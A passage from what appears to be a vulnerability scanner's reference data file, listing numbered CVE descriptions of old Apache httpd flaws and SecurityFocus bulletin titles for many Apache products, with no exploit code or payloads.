13887| [CVE-2000-1206] Vulnerability in Apache httpd before 1.3.11, when configured for mass virtual hosting using mod_rewrite, or mod_vhost_alias in Apache 1.3.9, allows remote attackers to retrieve arbitrary files.
13888| [CVE-2000-1205] Cross site scripting vulnerabilities in Apache 1.3.0 through 1.3.11 allow remote attackers to execute script as other web site visitors via (1) the printenv CGI (printenv.pl), which does not encode its output, (2) pages generated by the ap_send_error_response function such as a default 404, which does not add an explicit charset, or (3) various messages that are generated by certain Apache modules or core code. NOTE: the printenv issue might still exist for web browsers that can render text/plain content types as HTML, such as Internet Explorer, but CVE regards this as a design limitation of those browsers, not Apache. The printenv.pl/acuparam vector, discloser on 20070724, is one such variant.
13889| [CVE-2000-1204] Vulnerability in the mod_vhost_alias virtual hosting module for Apache 1.3.9, 1.3.11 and 1.3.12 allows remote attackers to obtain the source code for CGI programs if the cgi-bin directory is under the document root.
13890| [CVE-2000-1168] IBM HTTP Server 1.3.6 (based on Apache) allows remote attackers to cause a denial of service and possibly execute arbitrary commands via a long GET request.
13891| [CVE-2000-1016] The default configuration of Apache (httpd.conf) on SuSE 6.4 includes an alias for the /usr/doc directory, which allows remote attackers to read package documentation and obtain system configuration information via an HTTP request for the /doc/packages URL.
13892| [CVE-2000-0913] mod_rewrite in Apache 1.3.12 and earlier allows remote attackers to read arbitrary files if a RewriteRule directive is expanded to include a filename whose name contains a regular expression.
13893| [CVE-2000-0883] The default configuration of mod_perl for Apache as installed on Mandrake Linux 6.1 through 7.1 sets the /perl/ directory to be browseable, which allows remote attackers to list the contents of that directory.
13894| [CVE-2000-0869] The default configuration of Apache 1.3.12 in SuSE Linux 6.4 enables WebDAV, which allows remote attackers to list arbitrary diretories via the PROPFIND HTTP request method.
13895| [CVE-2000-0868] The default configuration of Apache 1.3.12 in SuSE Linux 6.4 allows remote attackers to read source code for CGI scripts by replacing the /cgi-bin/ in the requested URL with /cgi-bin-sdb/.
13896| [CVE-2000-0791] Trustix installs the httpsd program for Apache-SSL with world-writeable permissions, which allows local users to replace it with a Trojan horse.
13897| [CVE-2000-0760] The Snoop servlet in Jakarta Tomcat 3.1 and 3.0 under Apache reveals sensitive system information when a remote attacker requests a nonexistent URL with a .snp extension.
13898| [CVE-2000-0759] Jakarta Tomcat 3.1 under Apache reveals physical path information when a remote attacker requests a URL that does not exist, which generates an error message that includes the physical path.
13899| [CVE-2000-0628] The source.asp example script in the Apache ASP module Apache::ASP 1.93 and earlier allows remote attackers to modify files.
13900| [CVE-2000-0505] The Apache 1.3.x HTTP server for Windows platforms allows remote attackers to list directory contents by requesting a URL containing a large number of / characters.
13901| [CVE-1999-1412] A possible interaction between Apple MacOS X release 1.0 and Apache HTTP server allows remote attackers to cause a denial of service (crash) via a flood of HTTP GET requests to CGI programs, which generates a large number of processes.
13902| [CVE-1999-1293] mod_proxy in Apache 1.2.5 and earlier allows remote attackers to cause a denial of service via malformed FTP commands, which causes Apache to dump core.
13903| [CVE-1999-1237] Multiple buffer overflows in smbvalid/smbval SMB authentication library, as used in Apache::AuthenSmb and possibly other modules, allows remote attackers to execute arbitrary commands via (1) a long username, (2) a long password, and (3) other unspecified methods.
13904| [CVE-1999-1199] Apache WWW server 1.3.1 and earlier allows remote attackers to cause a denial of service (resource exhaustion) via a large number of MIME headers with the same name, aka the "sioux" vulnerability.
13905| [CVE-1999-1053] guestbook.pl cleanses user-inserted SSI commands by removing text between "<!--" and "-->" separators, which allows remote attackers to execute arbitrary commands when guestbook.pl is run on Apache 1.3.9 and possibly other versions, since Apache allows other closing sequences besides "-->".
13906| [CVE-1999-0926] Apache allows remote attackers to conduct a denial of service via a large number of MIME headers.
13907| [CVE-1999-0678] A default configuration of Apache on Debian GNU/Linux sets the ServerRoot to /usr/doc, which allows remote users to read documentation files for the entire server.
13908| [CVE-1999-0448] IIS 4.0 and Apache log HTTP request methods, regardless of how long they are, allowing a remote attacker to hide the URL they really request.
13909| [CVE-1999-0289] The Apache web server for Win32 may provide access to restricted files when a . (dot) is appended to a requested URL.
13910| [CVE-1999-0236] ScriptAlias directory in NCSA and Apache httpd allowed attackers to read CGI programs.
13911| [CVE-1999-0107] Buffer overflow in Apache 1.2.5 and earlier allows a remote attacker to cause a denial of service with a large number of GET requests containing a large number of / characters.
13912| [CVE-1999-0071] Apache httpd cookie buffer overflow for versions 1.1.1 and earlier.
13913|
13914| SecurityFocus - https://www.securityfocus.com/bid/:
13915| [104554] Apache HBase CVE-2018-8025 Security Bypass Vulnerability
13916| [104465] Apache Geode CVE-2017-15695 Remote Code Execution Vulnerability
13917| [104418] Apache Storm CVE-2018-8008 Arbitrary File Write Vulnerability
13918| [104399] Apache Storm CVE-2018-1332 User Impersonation Vulnerability
13919| [104348] Apache UIMA CVE-2017-15691 XML External Entity Injection Vulnerability
13920| [104313] Apache NiFi XML External Entity Injection and Denial of Service Vulnerability
13921| [104259] Apache Geode CVE-2017-12622 Authorization Bypass Vulnerability
13922| [104257] Apache Sling XSS Protection API CVE-2017-15717 Cross Site Scripting Vulnerability
13923| [104253] Apache ZooKeeper CVE-2018-8012 Security Bypass Vulnerability
13924| [104252] Apache Batik CVE-2018-8013 Information Disclosure Vulnerability
13925| [104239] Apache Solr CVE-2018-8010 XML External Entity Multiple Information Disclosure Vulnerabilities
13926| [104215] Apache ORC CVE-2018-8015 Denial of Service Vulnerability
13927| [104203] Apache Tomcat CVE-2018-8014 Security Bypass Vulnerability
13928| [104161] Apache Ambari CVE-2018-8003 Directory Traversal Vulnerability
13929| [104140] Apache Derby CVE-2018-1313 Security Bypass Vulnerability
13930| [104135] Apache Tika CVE-2018-1338 Denial of Service Vulnerability
13931| [104008] Apache Fineract CVE-2018-1291 SQL Injection Vulnerability
13932| [104007] Apache Fineract CVE-2018-1292 SQL Injection Vulnerability
13933| [104005] Apache Fineract CVE-2018-1289 SQL Injection Vulnerability
13934| [104001] Apache Tika CVE-2018-1335 Remote Command Injection Vulnerability
13935| [103975] Apache Fineract CVE-2018-1290 SQL Injection Vulnerability
13936| [103974] Apache Solr CVE-2018-1308 XML External Entity Injection Vulnerability
13937| [103772] Apache Traffic Server CVE-2017-7671 Denial of Service Vulnerability
13938| [103770] Apache Traffic Server CVE-2017-5660 Security Bypass Vulnerability
13939| [103751] Apache Hive CVE-2018-1282 SQL Injection Vulnerability
13940| [103750] Apache Hive CVE-2018-1284 Security Bypass Vulnerability
13941| [103692] Apache Ignite CVE-2018-1295 Arbitrary Code Execution Vulnerability
13942| [103528] Apache HTTP Server CVE-2018-1302 Denial of Service Vulnerability
13943| [103525] Apache HTTP Server CVE-2017-15715 Remote Security Bypass Vulnerability
13944| [103524] Apache HTTP Server CVE-2018-1312 Remote Security Bypass Vulnerability
13945| [103522] Apache HTTP Server CVE-2018-1303 Denial of Service Vulnerability
13946| [103520] Apache HTTP Server CVE-2018-1283 Remote Security Vulnerability
13947| [103516] Apache Struts CVE-2018-1327 Denial of Service Vulnerability
13948| [103515] Apache HTTP Server CVE-2018-1301 Denial of Service Vulnerability
13949| [103512] Apache HTTP Server CVE-2017-15710 Denial of Service Vulnerability
13950| [103508] Apache Syncope CVE-2018-1321 Multiple Remote Code Execution Vulnerabilities
13951| [103507] Apache Syncope CVE-2018-1322 Multiple Information Disclosure Vulnerabilities
13952| [103490] Apache Commons Compress CVE-2018-1324 Multiple Denial Of Service Vulnerabilities
13953| [103434] APACHE Allura CVE-2018-1319 HTTP Response Splitting Vulnerability
13954| [103389] Apache Tomcat JK Connector CVE-2018-1323 Directory Traversal Vulnerability
13955| [103222] Apache CloudStack CVE-2013-4317 Information Disclosure Vulnerability
13956| [103219] Apache Xerces-C CVE-2017-12627 Null Pointer Dereference Denial of Service Vulnerability
13957| [103206] Apache Geode CVE-2017-15693 Remote Code Execution Vulnerability
13958| [103205] Apache Geode CVE-2017-15692 Remote Code Execution Vulnerability
13959| [103170] Apache Tomcat CVE-2018-1304 Security Bypass Vulnerability
13960| [103144] Apache Tomcat CVE-2018-1305 Security Bypass Vulnerability
13961| [103102] Apache Oozie CVE-2017-15712 Information Disclosure Vulnerability
13962| [103098] Apache Karaf CVE-2016-8750 LDAP Injection Vulnerability
13963| [103069] Apache Tomcat CVE-2017-15706 Remote Security Weakness
13964| [103068] Apache JMeter CVE-2018-1287 Security Bypass Vulnerability
13965| [103067] Apache Qpid Dispatch Router 'router_core/connections.c' Denial of Service Vulnerability
13966| [103036] Apache CouchDB CVE-2017-12636 Remote Code Execution Vulnerability
13967| [103025] Apache Thrift CVE-2016-5397 Remote Command Injection Vulnerability
13968| [102879] Apache POI CVE-2017-12626 Multiple Denial of Service Vulnerabilities
13969| [102842] Apache NiFi CVE-2017-12632 Host Header Injection Vulnerability
13970| [102815] Apache NiFi CVE-2017-15697 Multiple Cross Site Scripting Vulnerabilities
13971| [102488] Apache Geode CVE-2017-9795 Remote Code Execution Vulnerability
13972| [102229] Apache Sling CVE-2017-15700 Information Disclosure Vulnerability
13973| [102226] Apache Drill CVE-2017-12630 Cross Site Scripting Vulnerability
13974| [102154] Multiple Apache Products CVE-2017-15708 Remote Code Execution Vulnerability
13975| [102127] Apache CXF Fediz CVE-2017-12631 Multiple Cross Site Request Forgery Vulnerabilities
13976| [102041] Apache Qpid Broker-J CVE-2017-15701 Denial of Service Vulnerability
13977| [102040] Apache Qpid Broker CVE-2017-15702 Security Weakness
13978| [102021] Apache Struts CVE-2017-15707 Denial of Service Vulnerability
13979| [101980] EMC RSA Authentication Agent for Web: Apache Web Server Authentication Bypass Vulnerability
13980| [101876] Apache Camel CVE-2017-12634 Deserialization Remote Code Execution Vulnerability
13981| [101874] Apache Camel CVE-2017-12633 Deserialization Remote Code Execution Vulnerability
13982| [101872] Apache Karaf CVE-2014-0219 Local Denial of Service Vulnerability
13983| [101868] Apache CouchDB CVE-2017-12635 Remote Privilege Escalation Vulnerability
13984| [101859] Apache CXF CVE-2017-12624 Denial of Service Vulnerability
13985| [101844] Apache Sling Servlets Post CVE-2017-11296 Cross Site Scripting Vulnerability
13986| [101686] Apache Hive CVE-2017-12625 Information Disclosure Vulnerability
13987| [101644] Apache Wicket CVE-2012-5636 Cross Site Scripting Vulnerability
13988| [101631] Apache Traffic Server CVE-2015-3249 Multiple Remote Code Execution Vulnerabilities
13989| [101630] Apache Traffic Server CVE-2014-3624 Access Bypass Vulnerability
13990| [101625] Apache jUDDI CVE-2009-1197 Security Bypass Vulnerability
13991| [101623] Apache jUDDI CVE-2009-1198 Cross Site Scripting Vulnerability
13992| [101620] Apache Subversion 'libsvn_fs_fs/fs_fs.c' Denial of Service Vulnerability
13993| [101585] Apache OpenOffice Multiple Remote Code Execution Vulnerabilities
13994| [101577] Apache Wicket CVE-2016-6806 Cross Site Request Forgery Vulnerability
13995| [101575] Apache Wicket CVE-2014-0043 Information Disclosure Vulnerability
13996| [101570] Apache Geode CVE-2017-9797 Information Disclosure Vulnerability
13997| [101562] Apache Derby CVE-2010-2232 Arbitrary File Overwrite Vulnerability
13998| [101560] Apache Portable Runtime Utility CVE-2017-12613 Multiple Information Disclosure Vulnerabilities
13999| [101558] Apache Portable Runtime Utility Local Out-of-Bounds Read Denial of Service Vulnerability
14000| [101532] Apache James CVE-2017-12628 Arbitrary Command Execution Vulnerability
14001| [101516] Apache HTTP Server CVE-2017-12171 Security Bypass Vulnerability
14002| [101261] Apache Solr/Lucene CVE-2017-12629 Information Disclosure and Remote Code Execution Vulnerabilities
14003| [101230] Apache Roller CVE-2014-0030 XML External Entity Injection Vulnerability
14004| [101173] Apache IMPALA CVE-2017-9792 Information Disclosure Vulnerability
14005| [101052] Apache Commons Jelly CVE-2017-12621 Security Bypass Vulnerability
14006| [101027] Apache Mesos CVE-2017-7687 Denial of Service Vulnerability
14007| [101023] Apache Mesos CVE-2017-9790 Denial of Service Vulnerability
14008| [100954] Apache Tomcat CVE-2017-12617 Incomplete Fix Remote Code Execution Vulnerability
14009| [100946] Apache Wicket CVE-2014-7808 Cross Site Request Forgery Vulnerability
14010| [100901] Apache Tomcat CVE-2017-12615 Remote Code Execution Vulnerability
14011| [100897] Apache Tomcat CVE-2017-12616 Information Disclosure Vulnerability
14012| [100880] Apache Directory LDAP API CVE-2015-3250 Unspecified Information Disclosure Vulnerability
14013| [100872] Apache HTTP Server CVE-2017-9798 Information Disclosure Vulnerability
14014| [100870] Apache Solr CVE-2017-9803 Remote Privilege Escalation Vulnerability
14015| [100859] puppetlabs-apache CVE-2017-2299 Information Disclosure Vulnerability
14016| [100829] Apache Struts CVE-2017-12611 Remote Code Execution Vulnerability
14017| [100823] Apache Spark CVE-2017-12612 Deserialization Remote Code Execution Vulnerability
14018| [100612] Apache Struts CVE-2017-9804 Incomplete Fix Denial of Service Vulnerability
14019| [100611] Apache Struts CVE-2017-9793 Denial of Service Vulnerability
14020| [100609] Apache Struts CVE-2017-9805 Remote Code Execution Vulnerability
14021| [100587] Apache Atlas CVE-2017-3155 Cross Frame Scripting Vulnerability
14022| [100581] Apache Atlas CVE-2017-3154 Information Disclosure Vulnerability
14023| [100578] Apache Atlas CVE-2017-3153 Cross Site Scripting Vulnerability
14024| [100577] Apache Atlas CVE-2017-3152 Cross Site Scripting Vulnerability
14025| [100547] Apache Atlas CVE-2017-3151 HTML Injection Vulnerability
14026| [100536] Apache Atlas CVE-2017-3150 Cross Site Scripting Vulnerability
14027| [100449] Apache Pony Mail CVE-2016-4460 Authentication Bypass Vulnerability
14028| [100447] Apache2Triad Multiple Security Vulnerabilities
14029| [100284] Apache Sling Servlets Post CVE-2017-9802 Cross Site Scripting Vulnerability
14030| [100280] Apache Tomcat CVE-2017-7674 Security Bypass Vulnerability
14031| [100259] Apache Subversion CVE-2017-9800 Remote Command Execution Vulnerability
14032| [100256] Apache Tomcat CVE-2017-7675 Directory Traversal Vulnerability
14033| [100235] Apache Storm CVE-2017-9799 Remote Code Execution Vulnerability
14034| [100082] Apache Commons Email CVE-2017-9801 SMTP Header Injection Vulnerability
14035| [99873] Apache Sling XSS Protection API CVE-2016-6798 XML External Entity Injection Vulnerability
14036| [99870] Apache Sling API CVE-2016-5394 Cross Site Scripting Vulnerability
14037| [99603] Apache Spark CVE-2017-7678 Cross Site Scripting Vulnerability
14038| [99592] Apache OpenMeetings CVE-2017-7685 Security Bypass Vulnerability
14039| [99587] Apache OpenMeetings CVE-2017-7673 Security Bypass Vulnerability
14040| [99586] Apache OpenMeetings CVE-2017-7688 Security Bypass Vulnerability
14041| [99584] Apache OpenMeetings CVE-2017-7684 Denial of Service Vulnerability
14042| [99577] Apache OpenMeetings CVE-2017-7663 Cross Site Scripting Vulnerability
14043| [99576] Apache OpenMeetings CVE-2017-7664 XML External Entity Injection Vulnerability
14044| [99569] Apache HTTP Server CVE-2017-9788 Memory Corruption Vulnerability
14045| [99568] Apache HTTP Server CVE-2017-9789 Denial of Service Vulnerability
14046| [99563] Apache Struts CVE-2017-7672 Denial of Service Vulnerability
14047| [99562] Apache Struts Spring AOP Functionality Denial of Service Vulnerability
14048| [99509] Apache Impala CVE-2017-5652 Information Disclosure Vulnerability
14049| [99508] Apache IMPALA CVE-2017-5640 Authentication Bypass Vulnerability
14050| [99486] Apache Traffic Control CVE-2017-7670 Denial of Service Vulnerability
14051| [99485] Apache Solr CVE-2017-7660 Security Bypass Vulnerability
14052| [99484] Apache Struts CVE-2017-9791 Remote Code Execution Vulnerability
14053| [99292] Apache Ignite CVE-2017-7686 Information Disclosure Vulnerability
14054| [99170] Apache HTTP Server CVE-2017-7679 Buffer Overflow Vulnerability
14055| [99137] Apache HTTP Server CVE-2017-7668 Denial of Service Vulnerability
14056| [99135] Apache HTTP Server CVE-2017-3167 Authentication Bypass Vulnerability
14057| [99134] Apache HTTP Server CVE-2017-3169 Denial of Service Vulnerability
14058| [99132] Apache HTTP Server CVE-2017-7659 Denial of Service Vulnerability
14059| [99112] Apache Thrift CVE-2015-3254 Denial of Service Vulnerability
14060| [99067] Apache Ranger CVE-2016-8751 HTML Injection Vulnerability
14061| [99018] Apache NiFi CVE-2017-7667 Cross Frame Scripting Vulnerability
14062| [99009] Apache NiFi CVE-2017-7665 Cross Site Scripting Vulnerability
14063| [98961] Apache Ranger CVE-2017-7677 Security Bypass Vulnerability
14064| [98958] Apache Ranger CVE-2017-7676 Security Bypass Vulnerability
14065| [98888] Apache Tomcat CVE-2017-5664 Security Bypass Vulnerability
14066| [98814] Apache Zookeeper CVE-2017-5637 Denial of Service Vulnerability
14067| [98795] Apache Hadoop CVE-2017-7669 Remote Privilege Escalation Vulnerability
14068| [98739] Apache Knox CVE-2017-5646 User Impersonation Vulnerability
14069| [98669] Apache Hive CVE-2016-3083 Security Bypass Vulnerability
14070| [98646] Apache Atlas CVE-2016-8752 Information Disclosure Vulnerability
14071| [98570] Apache Archiva CVE-2017-5657 Multiple Cross-Site Request Forgery Vulnerabilities
14072| [98489] Apache CXF Fediz CVE-2017-7661 Multiple Cross Site Request Forgery Vulnerabilities
14073| [98485] Apache CXF Fediz CVE-2017-7662 Cross Site Request Forgery Vulnerability
14074| [98466] Apache Ambari CVE-2017-5655 Insecure Temporary File Handling Vulnerability
14075| [98365] Apache Cordova For Android CVE-2016-6799 Information Disclosure Vulnerability
14076| [98025] Apache Hadoop CVE-2017-3161 Cross Site Scripting Vulnerability
14077| [98017] Apache Hadoop CVE-2017-3162 Input Validation Vulnerability
14078| [97971] Apache CXF CVE-2017-5656 Information Disclosure Vulnerability
14079| [97968] Apache CXF CVE-2017-5653 Spoofing Vulnerability
14080| [97967] Apache ActiveMQ CVE-2015-7559 Denial of Service Vulnerability
14081| [97949] Apache Traffic Server CVE-2017-5659 Denial of Service Vulnerability
14082| [97948] Apache Batik CVE-2017-5662 XML External Entity Information Disclosure Vulnerability
14083| [97947] Apache FOP CVE-2017-5661 XML External Entity Information Disclosure Vulnerability
14084| [97945] Apache Traffic Server CVE-2016-5396 Denial of Service Vulnerability
14085| [97702] Apache Log4j CVE-2017-5645 Remote Code Execution Vulnerability
14086| [97582] Apache CXF CVE-2016-6812 Cross Site Scripting Vulnerability
14087| [97579] Apache CXF JAX-RS CVE-2016-8739 XML External Entity Injection Vulnerability
14088| [97544] Apache Tomcat CVE-2017-5651 Information Disclosure Vulnerability
14089| [97531] Apache Tomcat CVE-2017-5650 Denial of Service Vulnerability
14090| [97530] Apache Tomcat CVE-2017-5648 Information Disclosure Vulnerability
14091| [97509] Apache Ignite CVE-2016-6805 Information Disclosure and XML External Entity Injection Vulnerabilities
14092| [97383] Apache Flex BlazeDS CVE-2017-5641 Remote Code Execution Vulnerability
14093| [97378] Apache Geode CVE-2017-5649 Information Disclosure Vulnerability
14094| [97229] Apache Ambari CVE-2016-4976 Local Information Disclosure Vulnerability
14095| [97226] Apache Camel CVE-2017-5643 Server Side Request Forgery Security Bypass Vulnerability
14096| [97184] Apache Ambari CVE-2016-6807 Remote Command Execution Vulnerability
14097| [97179] Apache Camel CVE-2016-8749 Java Deserialization Multiple Remote Code Execution Vulnerabilities
14098| [96983] Apache POI CVE-2017-5644 Denial Of Service Vulnerability
14099| [96895] Apache Tomcat CVE-2016-8747 Information Disclosure Vulnerability
14100| [96731] Apache NiFi CVE-2017-5636 Remote Code Injection Vulnerability
14101| [96730] Apache NiFi CVE-2017-5635 Security Bypass Vulnerability
14102| [96729] Apache Struts CVE-2017-5638 Remote Code Execution Vulnerability
14103| [96540] IBM Development Package for Apache Spark CVE-2016-4970 Denial of Service Vulnerability
14104| [96398] Apache CXF CVE-2017-3156 Information Disclosure Vulnerability
14105| [96321] Apache Camel CVE-2017-3159 Remote Code Execution Vulnerability
14106| [96293] Apache Tomcat 'http11/AbstractInputBuffer.java' Denial of Service Vulnerability
14107| [96228] Apache Brooklyn Cross Site Request Forgery and Multiple Cross Site Scripting Vulnerabilities
14108| [95998] Apache Ranger CVE-2016-8746 Security Bypass Vulnerability
14109| [95929] Apache Groovy CVE-2016-6497 Information Disclosure Vulnerability
14110| [95838] Apache Cordova For Android CVE-2017-3160 Man in the Middle Security Bypass Vulnerability
14111| [95675] Apache Struts Remote Code Execution Vulnerability
14112| [95621] Apache NiFi CVE-2106-8748 Cross Site Scripting Vulnerability
14113| [95429] Apache Groovy CVE-2016-6814 Remote Code Execution Vulnerability
14114| [95335] Apache Hadoop CVE-2016-3086 Information Disclosure Vulnerability
14115| [95168] Apache Wicket CVE-2016-6793 Denial of Service Vulnerability
14116| [95136] Apache Qpid Broker for Java CVE-2016-8741 Remote Information Disclosure Vulnerability
14117| [95078] Apache HTTP Server CVE-2016-0736 Remote Security Vulnerability
14118| [95077] Apache HTTP Server CVE-2016-8743 Security Bypass Vulnerability
14119| [95076] Apache HTTP Server CVE-2016-2161 Denial of Service Vulnerability
14120| [95020] Apache Tika CVE-2015-3271 Remote Information Disclosure Vulnerability
14121| [94950] Apache Hadoop CVE-2016-5001 Local Information Disclosure Vulnerability
14122| [94882] Apache ActiveMQ CVE-2016-6810 HTML Injection Vulnerability
14123| [94828] Apache Tomcat CVE-2016-8745 Information Disclosure Vulnerability
14124| [94766] Apache CouchDB CVE-2016-8742 Local Privilege Escalation Vulnerability
14125| [94657] Apache Struts CVE-2016-8738 Denial of Service Vulnerability
14126| [94650] Apache HTTP Server CVE-2016-8740 Denial of Service Vulnerability
14127| [94588] Apache Subversion CVE-2016-8734 XML External Entity Denial of Service Vulnerability
14128| [94513] Apache Karaf CVE-2016-8648 Remote Code Execution Vulnerability
14129| [94463] Apache Tomcat CVE-2016-8735 Remote Code Execution Vulnerability
14130| [94462] Apache Tomcat CVE-2016-6817 Denial of Service Vulnerability
14131| [94461] Apache Tomcat CVE-2016-6816 Security Bypass Vulnerability
14132| [94418] Apache OpenOffice CVE-2016-6803 Local Privilege Escalation Vulnerability
14133| [94247] Apache Tika CVE-2016-6809 Remote Code Execution Vulnerability
14134| [94221] Apache Ranger CVE-2016-6815 Local Privilege Escalation Vulnerability
14135| [94145] Apache OpenMeetings CVE-2016-8736 Remote Code Execution Vulnerability
14136| [93945] Apache CloudStack CVE-2016-6813 Authorization Bypass Vulnerability
14137| [93944] Apache Tomcat Security Manager CVE-2016-6796 Security Bypass Vulnerability
14138| [93943] Apache Tomcat CVE-2016-6794 Security Bypass Vulnerability
14139| [93942] Apache Tomcat Security Manager CVE-2016-5018 Security Bypass Vulnerability
14140| [93940] Apache Tomcat CVE-2016-6797 Security Bypass Vulnerability
14141| [93939] Apache Tomcat CVE-2016-0762 Information Disclosure Vulnerability
14142| [93774] Apache OpenOffice CVE-2016-6804 DLL Loading Remote Code Execution Vulnerability
14143| [93773] Apache Struts CVE-2016-6795 Directory Traversal Vulnerability
14144| [93478] Apache Tomcat CVE-2016-6325 Local Privilege Escalation Vulnerability
14145| [93472] Apache Tomcat CVE-2016-5425 Insecure File Permissions Vulnerability
14146| [93429] Apache Tomcat JK Connector CVE-2016-6808 Remote Buffer Overflow Vulnerability
14147| [93263] Apache Tomcat CVE-2016-1240 Local Privilege Escalation Vulnerability
14148| [93236] Apache MyFaces Trinidad CVE-2016-5019 Remote Code Execution Vulnerability
14149| [93142] Apache ActiveMQ Artemis CVE-2016-4978 Remote Code Execution Vulnerability
14150| [93132] Apache Derby CVE-2015-1832 XML External Entity Information Disclosure Vulnerability
14151| [93044] Apache Zookeeper CVE-2016-5017 Buffer Overflow Vulnerability
14152| [92966] Apache Jackrabbit CVE-2016-6801 Cross-Site Request Forgery Vulnerability
14153| [92947] Apache Shiro CVE-2016-6802 Remote Security Bypass Vulnerability
14154| [92905] Apache CXF Fediz CVE-2016-4464 Security Bypass Vulnerability
14155| [92577] Apache Ranger CVE-2016-5395 HTML Injection Vulnerability
14156| [92331] Apache HTTP Server CVE-2016-1546 Remote Denial of Service Vulnerability
14157| [92328] Apache Hive CVE-2016-0760 Multiple Remote Code Execution Vulnerabilities
14158| [92320] Apache APR-util and httpd CVE-2016-6312 Denial of Service Vulnerability
14159| [92100] Apache POI CVE-2016-5000 XML External Entity Injection Vulnerability
14160| [92079] Apache OpenOffice CVE-2016-1513 Remote Code Execution Vulnerability
14161| [91818] Apache Tomcat CVE-2016-5388 Security Bypass Vulnerability
14162| [91816] Apache HTTP Server CVE-2016-5387 Security Bypass Vulnerability
14163| [91788] Apache Qpid Proton CVE-2016-4467 Certificate Verification Security Bypass Vulnerability
14164| [91738] Apache XML-RPC CVE-2016-5003 Remote Code Execution Vulnerability
14165| [91736] Apache XML-RPC Multiple Security Vulnerabilities
14166| [91707] Apache Archiva CVE-2016-5005 HTML Injection Vulnerability
14167| [91703] Apache Archiva CVE-2016-4469 Multiple Cross-Site Request Forgery Vulnerabilities
14168| [91566] Apache HTTP Server CVE-2016-4979 Authentication Bypass Vulnerability
14169| [91537] Apache QPID CVE-2016-4974 Deserialization Security Bypass Vulnerability
14170| [91501] Apache Xerces-C CVE-2016-4463 Stack Buffer Overflow Vulnerability
14171| [91453] Apache Commons FileUpload CVE-2016-3092 Denial Of Service Vulnerability
14172| [91284] Apache Struts CVE-2016-4431 Security Bypass Vulnerability
14173| [91282] Apache Struts CVE-2016-4433 Security Bypass Vulnerability
14174| [91281] Apache Struts CVE-2016-4430 Cross-Site Request Forgery Vulnerability
14175| [91280] Apache Struts CVE-2016-4436 Security Bypass Vulnerability
14176| [91278] Apache Struts CVE-2016-4465 Denial of Service Vulnerability
14177| [91277] Apache Struts Incomplete Fix Remote Code Execution Vulnerability
14178| [91275] Apache Struts CVE-2016-4438 Remote Code Execution Vulnerability
14179| [91217] Apache Continuum 'saveInstallation.action' Command Execution Vulnerability
14180| [91141] Apache CloudStack CVE-2016-3085 Authentication Bypass Vulnerability
14181| [91068] Apache Struts CVE-2016-1181 Remote Code Execution Vulnerability
14182| [91067] Apache Struts CVE-2016-1182 Security Bypass Vulnerability
14183| [91024] Apache Shiro CVE-2016-4437 Information Disclosure Vulnerability
14184| [90988] Apache Ranger CVE-2016-2174 SQL Injection Vulnerability
14185| [90961] Apache Struts CVE-2016-3093 Denial of Service Vulnerability
14186| [90960] Apache Struts CVE-2016-3087 Remote Code Execution Vulnerability
14187| [90921] Apache Qpid CVE-2016-4432 Authentication Bypass Vulnerability
14188| [90920] Apache Qpid CVE-2016-3094 Denial of Service Vulnerability
14189| [90902] Apache PDFBox CVE-2016-2175 XML External Entity Injection Vulnerability
14190| [90897] Apache Tika CVE-2016-4434 XML External Entity Injection Vulnerability
14191| [90827] Apache ActiveMQ CVE-2016-3088 Multiple Arbitrary File Upload Vulnerabilities
14192| [90755] Apache Ambari CVE-2016-0707 Multiple Local Information Disclosure Vulnerabilities
14193| [90482] Apache CVE-2004-1387 Local Security Vulnerability
14194| [89762] Apache CVE-2001-1556 Remote Security Vulnerability
14195| [89417] Apache Subversion CVE-2016-2167 Authentication Bypass Vulnerability
14196| [89326] RETIRED: Apache Subversion CVE-2016-2167 Security Bypass Vulnerability
14197| [89320] Apache Subversion CVE-2016-2168 Remote Denial of Service Vulnerability
14198| [88826] Apache Struts CVE-2016-3082 Remote Code Execution Vulnerability
14199| [88797] Apache Cordova For iOS CVE-2015-5208 Arbitrary Code Execution Vulnerability
14200| [88764] Apache Cordova iOS CVE-2015-5207 Multiple Security Bypass Vulnerabilities
14201| [88701] Apache CVE-2001-1449 Remote Security Vulnerability
14202| [88635] Apache CVE-2000-1204 Remote Security Vulnerability
14203| [88590] Apache WWW server CVE-1999-1199 Denial-Of-Service Vulnerability
14204| [88496] Apache CVE-2000-1206 Remote Security Vulnerability
14205| [87828] Apache CVE-1999-1237 Remote Security Vulnerability
14206| [87784] Apache CVE-1999-1293 Denial-Of-Service Vulnerability
14207| [87327] Apache Struts CVE-2016-3081 Remote Code Execution Vulnerability
14208| [86622] Apache Stats CVE-2007-0975 Remote Security Vulnerability
14209| [86399] Apache CVE-2007-1743 Local Security Vulnerability
14210| [86397] Apache CVE-2007-1742 Local Security Vulnerability
14211| [86311] Apache Struts CVE-2016-4003 Cross Site Scripting Vulnerability
14212| [86174] Apache Wicket CVE-2015-5347 Cross Site Scripting Vulnerability
14213| [85971] Apache OFBiz CVE-2016-2170 Java Deserialization Remote Code Execution Vulnerability
14214| [85967] Apache OFBiz CVE-2015-3268 HTML Injection Vulnerability
14215| [85759] Apache Jetspeed CVE-2016-2171 Unauthorized Access Vulnerability
14216| [85758] Apache Jetspeed CVE-2016-0712 Cross Site Scripting Vulnerability
14217| [85756] Apache Jetspeed CVE-2016-0710 Multiple SQL Injection Vulnerabilities
14218| [85755] Apache Jetspeed CVE-2016-0711 Mulitple HTML Injection Vulnerabilities
14219| [85754] Apache Jetspeed CVE-2016-0709 Directory Traversal Vulnerability
14220| [85730] Apache Subversion CVE-2015-5343 Integer Overflow Vulnerability
14221| [85691] Apache Ranger CVE-2016-0735 Security Bypass Vulnerability
14222| [85578] Apache ActiveMQ CVE-2010-1244 Cross-Site Request Forgery Vulnerability
14223| [85554] Apache OpenMeetings CVE-2016-2164 Multiple Information Disclosure Vulnerabilities
14224| [85553] Apache OpenMeetings CVE-2016-0783 Information Disclosure Vulnerability
14225| [85552] Apache OpenMeetings CVE-2016-2163 HTML Injection Vulnerability
14226| [85550] Apache OpenMeetings CVE-2016-0784 Directory Traversal Vulnerability
14227| [85386] Apache Hadoop CVE-2015-7430 Local Privilege Escalation Vulnerability
14228| [85377] Apache Qpid Proton Python API CVE-2016-2166 Man in the Middle Security Bypass Vulnerability
14229| [85205] Apache Solr CVE-2015-8796 Cross Site Scripting Vulnerability
14230| [85203] Apache Solr CVE-2015-8795 Mulitple HTML Injection Vulnerabilities
14231| [85163] Apache Geronimo CVE-2008-0732 Local Security Vulnerability
14232| [85131] Apache Struts 'TextParseUtil.translateVariables()' Method Remote Code Execution Vulnerability
